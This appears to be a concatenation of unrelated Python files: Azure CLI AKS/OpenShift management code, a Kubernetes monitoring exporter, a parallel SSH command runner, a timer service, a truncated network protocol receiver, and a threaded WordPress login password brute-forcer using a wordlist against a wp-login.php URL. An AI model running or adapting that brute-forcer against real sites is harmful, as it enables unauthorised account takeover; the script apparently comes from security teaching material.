raise CLIError('Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type.lower() == "windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=zones,
enable_node_public_ip=enable_node_public_ip,
node_taints=taints_array,
mode=mode
)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool)
def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError("The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name,
kubernetes_version,
nodepool_name,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_update(cmd, client, resource_group_name, cluster_name, nodepool_name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
tags=None,
mode=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
if update_autoscaler > 1:
raise CLIError('Please specify one of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler"')
if (update_autoscaler == 0 and not tags and not mode):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning('Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_get_upgrade_profile(cmd, client, resource_group_name, cluster_name, nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
aad_session_key = None
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal, aad_session_key = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
'aad_session_key': aad_session_key,
}
def _ensure_osa_aad(cli_ctx,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
identifier=None,
name=None, create=False,
customer_admin_group_id=None):
rbac_client = get_graph_rbac_management_client(cli_ctx)
if create:
# This reply_url is temporary set since Azure need one to create the AAD.
app_id_name = 'https://{}'.format(name)
if not aad_client_app_secret:
aad_client_app_secret = _create_client_secret()
# Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API
resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6",
additional_properties=None, type="Scope")
# Read directory permissions on Windows Azure Active Directory API
directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04",
additional_properties=None, type="Role")
required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access],
additional_properties=None,
resource_app_id="00000002-0000-0000-c000-000000000000")
list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')"
.format(app_id_name)))
if list_aad_filtered:
aad_client_app_id = list_aad_filtered[0].app_id
# Updating reply_url with the correct FQDN information returned by the RP
reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(identifier)
update_application(client=rbac_client.applications,
object_id=list_aad_filtered[0].object_id,
display_name=name,
identifier_uris=[app_id_name],
reply_urls=[reply_url],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
logger.info('Updated AAD: %s', aad_client_app_id)
else:
result, _aad_session_key = create_application(client=rbac_client.applications,
display_name=name,
identifier_uris=[app_id_name],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
aad_client_app_id = result.app_id
logger.info('Created an AAD: %s', aad_client_app_id)
# Get the TenantID
if aad_tenant_id is None:
profile = Profile(cli_ctx=cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
return OpenShiftManagedClusterAADIdentityProvider(
client_id=aad_client_app_id,
secret=aad_client_app_secret,
tenant_id=aad_tenant_id,
kind='AADIdentityProvider',
customer_admin_group_id=customer_admin_group_id)
def _ensure_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal, _aad_session_key = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# add role first before save it
if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
logger.warning('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
}
def _create_client_secret():
# Add a special character to satsify AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError('Value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError('node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError('min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _validate_autoscaler_update_counts(min_count, max_count, is_enable_or_update):
"""
Validates the min, max, and node count when performing an update
"""
if min_count is None or max_count is None:
if is_enable_or_update:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('Value of min-count should be less than or equal to value of max-count.')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _remove_osa_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags', 'plan', 'type', 'id']
ap_master_attrs = ['name', 'os_type']
net_attrs = ['peer_vnet_id']
for managed_cluster in managed_clusters:
for attr in attrs:
if hasattr(managed_cluster, attr) and getattr(managed_cluster, attr) is None:
delattr(managed_cluster, attr)
for attr in ap_master_attrs:
if getattr(managed_cluster.master_pool_profile, attr, None) is None:
delattr(managed_cluster.master_pool_profile, attr)
for attr in net_attrs:
if getattr(managed_cluster.network_profile, attr, None) is None:
delattr(managed_cluster.network_profile, attr)
return managed_clusters
def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"australiaeast",
"canadacentral",
"centralindia",
"centralus",
"eastasia",
"eastus",
"eastus2",
"eastus2euap",
"japaneast",
"northcentralus",
"northeurope",
"southcentralus",
"southeastasia",
"southindia",
"uksouth",
"westcentralus",
"westus",
"westus2",
"westeurope"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
def osa_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_osa_nulls(list(managed_clusters))
def _format_workspace_id(workspace_id):
workspace_id = workspace_id.strip()
if not workspace_id.startswith('/'):
workspace_id = '/' + workspace_id
if workspace_id.endswith('/'):
workspace_id = workspace_id.rstrip('/')
return workspace_id
def openshift_create(cmd, client, resource_group_name, name, # pylint: disable=too-many-locals
location=None,
compute_vm_size="Standard_D4s_v3",
compute_count=3,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
vnet_prefix="10.0.0.0/8",
subnet_prefix="10.0.0.0/24",
vnet_peer=None,
tags=None,
no_wait=False,
workspace_id=None,
customer_admin_group_id=None):
if location is None:
location = _get_rg_location(cmd.cli_ctx, resource_group_name)
agent_pool_profiles = []
agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='compute', # Must be 12 chars or less before ACS RP adds to it
count=int(compute_count),
vm_size=compute_vm_size,
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.compute,
subnet_cidr=subnet_prefix
)
agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='infra', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.infra,
subnet_cidr=subnet_prefix
)
agent_pool_profiles.append(agent_node_pool_profile)
agent_pool_profiles.append(agent_infra_pool_profile)
agent_master_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='master', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
subnet_cidr=subnet_prefix
)
identity_providers = []
create_aad = False
# Validating if the cluster is not existing since we are not supporting the AAD rotation on OSA for now
try:
client.get(resource_group_name, name)
except CloudError:
# Validating if aad_client_app_id aad_client_app_secret aad_tenant_id are set
if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None:
create_aad = True
osa_aad_identity = _ensure_osa_aad(cmd.cli_ctx,
aad_client_app_id=aad_client_app_id,
aad_client_app_secret=aad_client_app_secret,
aad_tenant_id=aad_tenant_id, identifier=None,
name=name, create=create_aad,
customer_admin_group_id=customer_admin_group_id)
identity_providers.append(
OpenShiftManagedClusterIdentityProvider(
name='Azure AD',
provider=osa_aad_identity
)
)
auth_profile = OpenShiftManagedClusterAuthProfile(identity_providers=identity_providers)
default_router_profile = OpenShiftRouterProfile(name='default')
if vnet_peer is not None:
from msrestazure.tools import is_valid_resource_id, resource_id
if not is_valid_resource_id(vnet_peer):
vnet_peer = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network', type='virtualNetwork',
name=vnet_peer
)
if workspace_id is not None:
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
else:
monitor_profile = None
network_profile = NetworkProfile(vnet_cidr=vnet_prefix, peer_vnet_id=vnet_peer)
osamc = OpenShiftManagedCluster(
location=location, tags=tags,
open_shift_version="v3.11",
network_profile=network_profile,
auth_profile=auth_profile,
agent_pool_profiles=agent_pool_profiles,
master_pool_profile=agent_master_pool_profile,
router_profiles=[default_router_profile],
monitor_profile=monitor_profile)
try:
# long_running_operation_timeout=300
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name, resource_name=name, parameters=osamc)
result = LongRunningOperation(cmd.cli_ctx)(result)
instance = client.get(resource_group_name, name)
_ensure_osa_aad(cmd.cli_ctx,
aad_client_app_id=osa_aad_identity.client_id,
aad_client_app_secret=osa_aad_identity.secret,
aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname,
name=name, create=create_aad)
except CloudError as ex:
if "The resource type could not be found in the namespace 'Microsoft.ContainerService" in ex.message:
raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
if "No registered resource provider found for location" in ex.message:
raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
raise ex
def openshift_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_osa_nulls([mc])[0]
def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False):
instance = client.get(resource_group_name, name)
# TODO: change this approach when we support multiple agent pools.
idx = 0
for i in range(len(instance.agent_pool_profiles)):
if instance.agent_pool_profiles[i].name.lower() == "compute":
idx = i
break
instance.agent_pool_profiles[idx].count = int(compute_count) # pylint: disable=no-member
# null out the AAD profile and add manually the masterAP name because otherwise validation complains
instance.master_pool_profile.name = "master"
instance.auth_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def openshift_monitor_enable(cmd, client, resource_group_name, name, workspace_id, no_wait=False):
instance = client.get(resource_group_name, name)
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def openshift_monitor_disable(cmd, client, resource_group_name, name, no_wait=False):
instance = client.get(resource_group_name, name)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=False, workspace_resource_id=None) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
|
wp_killer2.py
|
from bhp3_class.web import get_words
from collections import deque
from io import BytesIO
from lxml import etree
import requests
import sys
import threading
import time
EXTENSIONS = ['.php', '.bak', '.orig', '.inc']
SUCCESS = 'Welcome to WordPress!'
WORDLIST = '/Users/jtimarnold/Downloads/cain.txt'
def get_params(content):
params = dict()
parser = etree.HTMLParser()
tree = etree.parse(BytesIO(content), parser=parser)
for elem in tree.findall('//input'):
name = elem.get('name')
if name:
params[name] = elem.get('value', None)
return params
class Bruter:
def __init__(self, username, url):
self.username = username
self.url = url
self.found = False
print(f'\nBrute Force Attack beginning on {url}.\n')
print("Finished the setup where username = %s\n" % username)
def run_bruteforce(self, passwords):
for _ in range(10):
t = threading.Thread(target=self.web_bruter, args=(passwords,))
t.start()
def web_bruter(self, passwords):
session = requests.Session()
while True:
time.sleep(5)
try:
brute = passwords.popleft()
except IndexError:
print('Thread quits with no match.')
sys.exit()
print(f'Trying username/password {self.username}/{brute:<10}')
resp0 = session.get(self.url)
params = get_params(resp0.content)
params['log'] = self.username
params['pwd'] = brute
resp1 = session.post(self.url, data=params)
if SUCCESS in resp1.content.decode():
self.found = True
print(f"\nBruteforcing successful.")
print("Username is %s" % self.username)
print("Password is %s\n" % brute)
passwords.clear()
print('done: now cleaning up.')
if __name__ == '__main__':
url = "http://boodelyboo.com/wordpress/wp-login.php"
words = get_words(WORDLIST)
b = Bruter('tiarno', url)
b.run_bruteforce(deque(words))
|
WaitingService.py
|
from time import sleep
from datetime import datetime
from Common.Configuration.ConfigurationService import ConfigurationService
import threading
import time
class WaitingService:
def __init__(self, configurationService: ConfigurationService):
self.isCancelled = True
self.configurationService = configurationService
self._update_seconds_between()
thread = threading.Thread(target=self._wait, name='waitingService')
thread.start()
def start(self, action):
self.isCancelled = False
self._update_seconds_between()
self.action = action
def cancel(self):
self.isCancelled = True
sleep(0.6)
def _update_seconds_between(self):
self.secondsBetween = self.configurationService.get_records_seconds_between()
def _wait(self):
while True:
while self.isCancelled:
sleep(0.5)
secondsLeft = self._how_many_seconds_should_wait()
waitedFullTime = self._wait_this_time(secondsLeft)
if waitedFullTime:
self.action()
def _how_many_seconds_should_wait(self) -> int:
timeInSeconds = int(time.time())
howLongShouldWait = self.secondsBetween - timeInSeconds % self.secondsBetween
return howLongShouldWait
def _wait_this_time(self, secondsLeft: int) -> bool:
secondsBetweenSettingWhenStarted = self.secondsBetween
while secondsLeft > 0:
sleep(1)
if self.isCancelled or self.secondsBetween != secondsBetweenSettingWhenStarted:
return False
secondsLeft -= 1
return True
|
extended-monitoring.py
|
#!/usr/bin/env python3
# Copyright 2021 Flant JSC
# Licensed under the Deckhouse Platform Enterprise Edition (EE) license.
# See https://github.com/deckhouse/deckhouse/blob/main/ee/LICENSE
from concurrent.futures.thread import ThreadPoolExecutor
from itertools import chain
from threading import Thread
from time import sleep
import logging
import kubernetes
import copy
import sys
from abc import ABC, abstractmethod
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
kubernetes.config.load_incluster_config()
logging.basicConfig(format='[%(asctime)s] - %(message)s', level=logging.INFO)
EXTENDED_MONITORING_ANNOTATION_THRESHOLD_PREFIX = "threshold.extended-monitoring.flant.com/"
EXTENDED_MONITORING_ENABLED_ANNOTATION = "extended-monitoring.flant.com/enabled"
DEFAULT_SERVER_ADDRESS = '0.0.0.0'
DEFAULT_PORT = 8080
class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
daemon_threads = True
class Annotated(ABC):
default_thresholds = {}
def __init__(self, namespace, name, kube_annotations):
self.namespace = namespace
self.name = name
self.enabled = True
if kube_annotations:
if not {EXTENDED_MONITORING_ENABLED_ANNOTATION: "false"}.items() <= kube_annotations.items():
self.thresholds = copy.deepcopy(self.default_thresholds)
for name, value in kube_annotations.items():
if name.startswith(EXTENDED_MONITORING_ANNOTATION_THRESHOLD_PREFIX):
self.thresholds.update(
{name.replace(EXTENDED_MONITORING_ANNOTATION_THRESHOLD_PREFIX, ""): value})
else:
self.enabled = False
else:
self.thresholds = copy.deepcopy(self.default_thresholds)
@classmethod
def list_threshold_annotated_objects(cls, namespace):
for kube_object in cls.list(namespace):
yield cls(namespace, kube_object.metadata.name, kube_object.metadata.annotations)
@property
def formatted(self):
to_return = ""
if self.enabled:
to_return += 'extended_monitoring_{}_enabled{{namespace="{}", {}="{}"}} {}\n'.format(
self.kind.lower(),
self.namespace,
self.kind.lower(),
self.name, 1)
if hasattr(self, "thresholds"):
for k, v in self.thresholds.items():
to_return += 'extended_monitoring_{}_threshold{{namespace="{}", threshold="{}", {}="{}"}} {}\n'.format(
self.kind.lower(),
self.namespace,
k,
self.kind.lower(),
self.name, int(v))
else:
to_return += 'extended_monitoring_{}_enabled{{namespace="{}", {}="{}"}} {}\n'.format(
self.kind.lower(),
self.namespace,
self.kind.lower(),
self.name, 0)
return to_return
@property
@abstractmethod
def kind(self):
pass
@property
@abstractmethod
def api(self):
pass
@classmethod
@abstractmethod
def list(cls, namespace):
pass
class AnnotatedDeployment(Annotated):
kind = "Deployment"
api = kubernetes.client.AppsV1Api()
@classmethod
def list(cls, namespace):
return cls.api.list_namespaced_deployment(namespace).items
default_thresholds = {
"replicas-not-ready": 0
}
class AnnotatedStatefulSet(Annotated):
kind = "StatefulSet"
api = kubernetes.client.AppsV1Api()
@classmethod
def list(cls, namespace):
return cls.api.list_namespaced_stateful_set(namespace).items
default_thresholds = {
"replicas-not-ready": 0
}
class AnnotatedDaemonSet(Annotated):
kind = "DaemonSet"
api = kubernetes.client.AppsV1Api()
@classmethod
def list(cls, namespace):
return cls.api.list_namespaced_daemon_set(namespace).items
default_thresholds = {
"replicas-not-ready": 0
}
class AnnotatedPod(Annotated):
kind = "Pod"
api = kubernetes.client.CoreV1Api()
@classmethod
def list(cls, namespace):
return cls.api.list_namespaced_pod(namespace).items
default_thresholds = {
"disk-bytes-warning": 85,
"disk-bytes-critical": 95,
"disk-inodes-warning": 85,
"disk-inodes-critical": 90,
"container-throttling-warning": 25,
"container-throttling-critical": 50,
}
class AnnotatedIngress(Annotated):
kind = "Ingress"
api = kubernetes.client.ExtensionsV1beta1Api()
@classmethod
def list(cls, namespace):
return cls.api.list_namespaced_ingress(namespace).items
default_thresholds = {
"5xx-warning": 10,
"5xx-critical": 20
}
class AnnotatedNode(Annotated):
kind = "Node"
api = kubernetes.client.CoreV1Api()
@classmethod
def list(cls, namespace=None):
return cls.api.list_node().items
default_thresholds = {
"disk-bytes-warning": 70,
"disk-bytes-critical": 80,
"disk-inodes-warning": 85,
"disk-inodes-critical": 90,
"load-average-per-core-warning": 3,
"load-average-per-core-critical": 10,
}
class AnnotatedCronJob(Annotated):
kind = "CronJob"
api = kubernetes.client.BatchV1beta1Api()
@classmethod
def list(cls, namespace):
return cls.api.list_namespaced_cron_job(namespace).items
KUBERNETES_OBJECTS = (
AnnotatedNode,
)
KUBERNETES_NAMESPACED_OBJECTS = (
AnnotatedDeployment,
AnnotatedStatefulSet,
AnnotatedDaemonSet,
AnnotatedPod,
AnnotatedIngress,
AnnotatedCronJob,
)
corev1 = kubernetes.client.CoreV1Api()
apis = kubernetes.client.ApisApi()
def _list_objects(executor, objects, namespace):
yield from chain.from_iterable(executor.map(lambda k: k.list_threshold_annotated_objects(namespace), objects))
def _get_metrics():
enabled_nses = []
quantity = 0
# iterate over namespaced objects in explicitly enabled via annotation Namespaces
ns_list = (
ns.metadata.name for ns in corev1.list_namespace().items
if ns.metadata.annotations
and EXTENDED_MONITORING_ENABLED_ANNOTATION in ns.metadata.annotations.keys()
)
response = """# HELP extended_monitoring_annotations Extended monitoring annotations
# TYPE extended_monitoring_annotations gauge\n"""
with ThreadPoolExecutor(max_workers=8) as executor:
def _list_in_ns(ns):
enabled_nses.append('\nextended_monitoring_enabled{{namespace="{}"}} 1'.format(ns))
yield from _list_objects(executor, KUBERNETES_NAMESPACED_OBJECTS, ns)
for annotated_object in chain.from_iterable(executor.map(_list_in_ns, ns_list)):
response += annotated_object.formatted
quantity += 1
for annotated_object in _list_objects(executor, KUBERNETES_OBJECTS, None):
response += annotated_object.formatted
quantity += 1
response += '\n'.join(enabled_nses)
quantity += len(enabled_nses)
return response, quantity
class GetHandler(BaseHTTPRequestHandler):
_response = ""
@classmethod
def get_metrics(cls):
# setting string variable is atomic in Python
cls._response, quantity = _get_metrics()
logging.info('Metrics are collected successfully. Batches quantity: {}'.format(quantity))
@classmethod
def loop_get_metrics(cls):
while 1:
try:
cls.get_metrics()
except Exception as loop_err:
logging.info(str(loop_err))
sleep(30)
def do_GET(self):
if self.path == "/ready":
apis.get_api_versions()
self.send_response(200)
self.end_headers()
return
if self.path == "/healthz":
self.send_response(200)
self.end_headers()
return
if self.path == "/metrics":
self.send_response(200)
self.send_header('Content-Type',
'text/plain; charset=utf-8')
self.end_headers()
self.wfile.write(self.__class__._response.encode(encoding="utf-8"))
return
self.send_response(404)
self.end_headers()
if __name__ == '__main__':
server_address = DEFAULT_SERVER_ADDRESS
server_port = DEFAULT_PORT
# Parse host and port
if len(sys.argv) >= 2:
server_address = sys.argv[1]
if len(sys.argv) == 3:
server_port = int(sys.argv[2])
# Get metrics once synchronously before starting web server
GetHandler.get_metrics()
server = ThreadingHTTPServer((server_address, server_port), GetHandler)
try:
# Run metrics renew in background (daemon thread is canceled on the script exit)
Thread(target=GetHandler.loop_get_metrics, daemon=True).start()
logging.info('Starting server')
server.serve_forever()
except Exception as err:
logging.info('Shutting down server')
raise err
|
rcmd.py
|
import paramiko
import threading
import sys
import os
import getpass
def rcmd(host, user='root', passwd=None, port=22, cmds=None):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname=host, port=port, username=user, password=passwd)
stdin, stdout, stderr = ssh.exec_command(cmds)
out = stdout.read()
err = stderr.read()
if out:
print('[%s] \033[32;1mOUT\033[0m:\n%s' % (host, out.decode()))
if err:
print('[%s] \033[31;1mERROR\033[0m:\n%s' % (host, err.decode()))
ssh.close()
if __name__ == '__main__':
if len(sys.argv) != 3:
print('Usage: %s ipfile "commands"' % sys.argv[0])
exit(1)
if not os.path.isfile(sys.argv[1]):
print('No such file %s' % sys.argv[1])
exit(2)
hostfile = sys.argv[1]
cmds = sys.argv[2]
password = getpass.getpass()
with open(hostfile) as fobj:
for line in fobj:
ip = line.strip()
# rcmd(ip, passwd=password, cmds=cmds)
t = threading.Thread(target=rcmd, args=(ip,), kwargs={'passwd': password, 'cmds': cmds})
t.start() # target(*args, **kwargs)
|
sr_receiver.py
|
import time
from collections import deque
from threading import Lock, Condition, Thread
from senders.udt_sender import UDTSender, LossyUDTSender, CorruptingUDTSender
from helpers.logger_utils import get_stdout_logger
from receivers.udt_receiver import UDTReceiver, InterruptableUDTReceiver
from senders.sr_sender import SelectiveRepeatSender
logger = get_stdout_logger('sr_receiver')
class SelectiveRepeatReceiver:
def __init__(self, window_size=4, max_seq_num=-1, loss_prob=0):
self.cnt=0
self.udt_receiver = InterruptableUDTReceiver(UDTReceiver())
self.udt_listening_receiver = InterruptableUDTReceiver(UDTReceiver())
self.current_window = deque([None for _ in range(window_size)])
self.window_size = window_size
self.max_seq_num = max(2 * window_size, max_seq_num)
self.base_seq_num = 0
self.data_queue = deque()
